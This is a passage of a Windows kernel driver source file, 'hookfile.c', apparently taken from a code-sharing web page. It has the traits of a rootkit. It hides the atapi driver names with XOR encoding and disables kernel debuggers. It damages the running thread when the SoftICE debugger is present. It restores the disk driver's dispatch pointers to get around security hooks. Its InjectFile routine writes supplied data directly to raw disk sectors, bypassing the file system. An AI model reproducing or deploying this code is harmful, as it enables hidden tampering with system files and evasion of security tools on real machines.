📄 hookfile.c
字号:
// DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
// __try
// {
// ProbeForRead( (PVOID)0x4000, 0x1010, FALSE);
// }
// __except(1)
// {
// ;
// }
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
IoDeleteDevice(DriverObject->DeviceObject);
// DebugPrint("Failed to create symbolic link!\n");
return ntStatus;
}
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,FTDISK);
}
// Create dispatch points for all routines that must be handled
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DisableWindbg();
DriverObject->DriverUnload = DriverUnload;
{
GetAtapiDispatchFromFile(&gDispatchRoutine, &gInternRoutine);
FsGetFileRetrievalPointers(NULL, 0);
}
return STATUS_SUCCESS;
}
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
// Delete the symbolic link for our device
//
RtlInitUnicodeString( &deviceLinkUnicodeString, DeviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
//
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
ULONG
GetModuleBase(
PUCHAR ModuleFileName
)
{
NTSTATUS ntStatus = STATUS_SUCCESS;
ULONG Base = 0;
ULONG dwNeededSize = 0;
PMODULES pModules=(PMODULES)&pModules;
PSYSTEM_MODULE_INFORMATION pSysModInfo;
ULONG i;
PUCHAR ImageName;
PUCHAR p;
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, 0, &dwNeededSize);
pModules = ExAllocatePool(NonPagedPool, dwNeededSize);
if (pModules == NULL)
{
goto End;
}
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,HARD_VOLUME);
}
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, dwNeededSize, &dwNeededSize);
if (!NT_SUCCESS(ntStatus))
{
ExFreePool(pModules);
goto End;
}
pSysModInfo = &pModules->smi;
for (i = 0; i < pModules->dwNumberOfModules; ++i)
{
ImageName = pSysModInfo->ImageName;
p = strrchr(ImageName, '\\');
if (p != NULL)
p++;
else
p = ImageName;
if (_stricmp(p, ModuleFileName) == 0)
{
Base = (ULONG)pSysModInfo->Base;
break;
}
ImageName += sizeof(SYSTEM_MODULE_INFORMATION);
pSysModInfo++;
}
ExFreePool(pModules);
End:
return Base;
}
ULONG GetModuleBaseAndSize( PUCHAR ModuleFileName, OUT PDWORD dwSize)
{
NTSTATUS ntStatus = STATUS_SUCCESS;
ULONG Base = 0;
ULONG dwNeededSize = 0;
PMODULES pModules=(PMODULES)&pModules;
PSYSTEM_MODULE_INFORMATION pSysModInfo;
ULONG i;
PUCHAR ImageName;
PUCHAR p;
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, 0, &dwNeededSize);
pModules = ExAllocatePool(NonPagedPool, dwNeededSize);
if (pModules == NULL)
{
goto End;
}
ntStatus = ZwQuerySystemInformation(SystemModuleInformation,
pModules, dwNeededSize, &dwNeededSize);
if (!NT_SUCCESS(ntStatus))
{
ExFreePool(pModules);
goto End;
}
pSysModInfo = &pModules->smi;
for (i = 0; i < pModules->dwNumberOfModules; ++i)
{
ImageName = pSysModInfo->ImageName;
p = strrchr(ImageName, '\\');
if (p != NULL)
p++;
else
p = ImageName;
if (_stricmp(p, ModuleFileName) == 0)
{
Base = (ULONG)pSysModInfo->Base;
if ( dwSize != NULL )
*dwSize = pSysModInfo->Size;
break;
}
ImageName += sizeof(SYSTEM_MODULE_INFORMATION);
pSysModInfo++;
}
ExFreePool(pModules);
End:
return Base;
}
PDEVICE_OBJECT GetAtapiDevice()
{
DWORD ModuleBase;
UNICODE_STRING UniAtapi;
UNICODE_STRING uniObXXX;
PDRIVER_OBJECT pDrvObj;
PDEVICE_OBJECT pDevObj = NULL;
NTSTATUS ntStatus;
char szXXXSys[0x10] = {0};
WCHAR szXXXDrvName[0x30] = {0};
DWORD iIndex = 0;
unsigned char data[9] = {
0x74, 0x61, 0x74, 0x65, 0x7C, 0x3B, 0x66, 0x6C, 0x66 //
};
unsigned char data2[13] = {
0x69, 0x71, 0x47, 0x5C, 0x43, 0x50, 0x47, 0x69, 0x54, 0x41, 0x54, 0x45, 0x5C // \Driver\api
};
if ( gAtapiDevObj != NULL )
return gAtapiDevObj;
for ( iIndex = 0; iIndex < 9; iIndex++)
{
szXXXSys[iIndex] = data[iIndex]^0x15;
}
for ( iIndex = 0; iIndex < 13; iIndex++)
{
szXXXDrvName[iIndex] = data2[iIndex]^0x35;
}
KKDbgPrint("szXXXSys: %s..%ws..\r\n", szXXXSys, szXXXDrvName);
ModuleBase = GetModuleBase(szXXXSys);
RtlInitUnicodeString( &UniAtapi, szXXXDrvName);
RtlInitUnicodeString( &uniObXXX, L"ObReferenceObjectByName");
MyObReferenceObjectByName = (XXXObReferenceObjectByName)MmGetSystemRoutineAddress(&uniObXXX);
ntStatus = MyObReferenceObjectByName(&UniAtapi,
OBJ_CASE_INSENSITIVE,
NULL,
0,
IoDriverObjectType,
KernelMode,
NULL,
&pDrvObj);
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,HARD_VOLUME);
}
if ( NT_SUCCESS(ntStatus) )
{
gDiskDrvObj = pDrvObj;
pDevObj = GetDr0Device(pDrvObj);
if ( pDevObj != NULL )
{
KKDbgPrint("ata dr0 dev obj is : %08x...", pDevObj);
gAtapiDevObj = pDevObj;
}
ObDereferenceObject(pDrvObj);
}
return pDevObj;
}
BOOL CheckUrlSum( char* inbuffer, int len)
{
int cals;
char cXX = 0;
int index;
char ctmp;
if ( len <= 4 )
return FALSE;
cals= len-4;
cXX = (inbuffer[0]^0x9a)+ 0x57;
if ( cXX != inbuffer[cals] )
return FALSE;
cXX = (inbuffer[2]^0x9a) + 0xdb;
if ( cXX != inbuffer[cals+1] )
return FALSE;
cXX = (inbuffer[1]^0x9a) + 0x36;
if ( cXX != inbuffer[cals+3] )
return FALSE;
cXX = 0;
for ( index = 0; index < len-4; index++)
{
ctmp = inbuffer[index];
cXX += ctmp;
}
if ( cXX != inbuffer[cals+2] )
return FALSE;
return TRUE;
}
BOOL InjectFile(PVOID inputBuffer, DWORD inputBufferLength)
{
PDEVICE_OBJECT pDevObj;
DWORD dwSector = 0;
char szOrgBuffer[SECTOR_SIZE];
if ( gDiskPos.LowPart == 0 )
return FALSE;
pDevObj = GetAtapiDevice();
if ( pDevObj == NULL )
return FALSE;
dwSector = inputBufferLength/512;
if ( inputBufferLength%512 )
dwSector++;
DbgPrint("dwSectors: %d..\r\n", dwSector);
{
UNICODE_STRING unstr;
RtlInitUnicodeString(&unstr,PCIHDD_DR0DEVICE_NAME);
}
KKDbgPrint("xxxx File is DWORD,%08x...\r\n", *(DWORD*)inputBuffer );
if ( inputBufferLength < 512 )
return FALSE;
if ( gXXXOffset != 0x29A557 )
{
if ( gXXXOffset != 0 && gXXXOffset < inputBufferLength-4)
{
char* buffer;
char* pszEndMark;
buffer = (char*)inputBuffer;
buffer += gXXXOffset;
if ( !CheckUrlSum(buffer, inputBufferLength-gXXXOffset) )
{
return FALSE;
}
// *(DWORD*)(&buffer[inputBufferLength-4]) = 0x9a;
pszEndMark = buffer-gXXXOffset+inputBufferLength-4;
*pszEndMark = 0x9a;
KKDbgPrint("zero xxx is: %08x..%02x\r\n", inputBufferLength-4, *pszEndMark );
}
else
return FALSE;
}
if ( !NT_SUCCESS( SendCommand( pDevObj, IRP_MJ_READ, szOrgBuffer, gDiskPos.LowPart, 1) ) )
return FALSE;
// if ( memcmp( szOrgBuffer, gUserinitBuffer, 100) != 0 )
// {
// KKDbgPrint("non same...\r\n");
//
// return FALSE;
// }
if ( !NT_SUCCESS( SendCommand( pDevObj, IRP_MJ_WRITE, inputBuffer, gDiskPos.LowPart, dwSector) ) )
return FALSE;
KKDbgPrint("xxxx File is here,%08x..%08x..\r\n", pDevObj, gDiskPos.LowPart);
return TRUE;
}
BOOL xxxPassSNDisk(PVOID inputBuffer, DWORD inputBufferLength)
{
PDRIVER_OBJECT pDrvObj = NULL;
PDEVICE_OBJECT pDevObj = NULL;
DWORD ModuleBase = 0;
CHAR szXXXDrvName[0x30] = {0};
DWORD iIndex = 0;
unsigned char data[9] = {
0x74, 0x61, 0x74, 0x65, 0x7C, 0x3B, 0x66, 0x6C, 0x66
};
if ( gDispatchRoutine == 0 )
return FALSE;
for ( iIndex = 0; iIndex < 9; iIndex++)
{
szXXXDrvName[iIndex] = data[iIndex]^0x15;
}
pDevObj = GetAtapiDevice();
if ( pDevObj == NULL )
return FALSE;
ModuleBase = GetModuleBase(szXXXDrvName);
if ( ModuleBase == 0 )
return FALSE;
// if ( !GetNtOSKernelBase() )
// {
// DWORD iIndex;
// for ( iIndex = 0; iIndex < 0x20; iIndex++)
// {
// DWORD* lpBuffer;
// lpBuffer = (DWORD*)PsGetCurrentThread();
// lpBuffer[iIndex] = 0xe8;
// }
// }
KKDbgPrint("dis:%08x...intern: %08x\r\n", gDispatchRoutine, gInternRoutine);
{
static BOOL bAddedBase = FALSE;
if ( !bAddedBase )
{
gDispatchRoutine += ModuleBase; // 原始的地址
gInternRoutine += ModuleBase;
bAddedBase = TRUE;
}
}
if ( gDiskDrvObj == NULL )
return FALSE;
gSNDiskDispathc = (DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL];
gSNDiskInternDp = (DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL];
KKDbgPrint("file drv obj is : %08x...dev control:%08x...intern: %08x", (DWORD)pDrvObj,
gDispatchRoutine,
gInternRoutine);
KKDbgPrint("drv obj is : %08x...dev control:%08x...intern: %08x", (DWORD)pDrvObj,
gSNDiskDispathc,
gSNDiskInternDp);
if ( gSNDiskInternDp != gInternRoutine )
{
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = gDispatchRoutine;
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = gInternRoutine;
}
return TRUE;
}
NTSTATUS
DriverDispatch(
IN PDEVICE_OBJECT pDeviceObj,
IN PIRP pIrp
)
{
PIO_STACK_LOCATION pIrpStack;
char szIce[] = "ntice.sys";
NTSTATUS ntstatus;
ntstatus = pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
KdDisableDebugger();
pIrpStack = IoGetCurrentIrpStackLocation( pIrp);
if ( GetModuleBase(szIce) > 0 )
{
RtlCopyMemory( PsGetCurrentThread(), (PVOID)&DriverDispatch, 0x60);
}
// {
// DWORD dwIndex = 0;
// if ( KeGetCurrentIrql() == PASSIVE_LEVEL )
// {
// __try
// {
// ProbeForRead( pIrpStack, 0x1020, FALSE);
// }
// __except(1)
// {
// dwIndex++;
// }
// }
// }
switch (pIrpStack->MajorFunction) {
case IRP_MJ_CREATE :
{
}
break;
case IRP_MJ_CLOSE :
{
if ( gDiskDrvObj && gSNDiskDispathc && gSNDiskInternDp )
{
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = gSNDiskDispathc;
(DWORD)gDiskDrvObj->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = gSNDiskInternDp;
KKDbgPrint("recover dispatch routine ok...\r\n");
}
}
break;
case IRP_MJ_DEVICE_CONTROL:
DisableWindbg();
DriverDeviceControl( pDeviceObj, pIrp);
break;
default:
break;
}
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
DriverDeviceControl( PDEVICE_OBJECT pDeviceObj, PIRP pIrp)
{
NTSTATUS ntStatus;
PIO_STACK_LOCATION pIrpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG IoControlCode;
//
// Go ahead and set the request up as successful
//
ntStatus = pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -